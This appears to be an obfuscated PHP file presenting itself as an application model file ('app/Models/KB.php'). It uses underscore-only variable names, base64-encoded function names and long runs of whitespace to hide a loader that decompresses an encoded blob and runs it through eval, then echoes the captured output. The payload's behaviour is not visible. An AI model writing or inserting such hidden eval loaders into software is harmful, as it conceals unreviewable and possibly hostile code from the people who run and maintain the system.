<?php 
        $__='printf';$_='Loading app/Models/KB.php';
        







































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2k1vgjAYAOA7yf4DB5O6ZHGA2wwhHIAoAzfNNIPCxUhBYKJ065Tprx+KmzO7bNlHsuV9Gj7a5qVJ36YHUp6v1EYlFdGHdP44Qcq2uqOiMaWn13kYZey0qzdoQnkjGzPWaDSQwu0+wB9xUH6+cJvM8N9IfdeCsCgzzxVT32yraNu0z/KH7FaPygMAwP+EyMwRQmwvLNORPLfI7Y48watpq9o0y12z2q5HMFUAAAAAAAD8NfA7AwAA/i8UjFl0cTYKI5KHEVJgRgAAAIAvOTxSYMR04bliRpp64km38Q3WC9wWl77pMLJmXWPurP2hbgfmkxi42cLDgwy3B0lodlIP98p3hwXNjui758JLXL/Iu570lJDmdTwUrNjHiVD2T8lK7wXSIAs02jJSLbYMbdlN8zgSdBrMkozMMsE35bvJULu/KvJNf0wu7WVoOnflNbWMgeC5NvOHmmwZoRBKToqlXkJmnclYsub9gspGrKpI4bjfn1B1+6zvasfKZ8LfxH4ksLYfsI42d3TyOiycA/ndcyCHOakfLIIqJcfKM+KDnHA=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































                                                                                                                                                                                                                     $________;
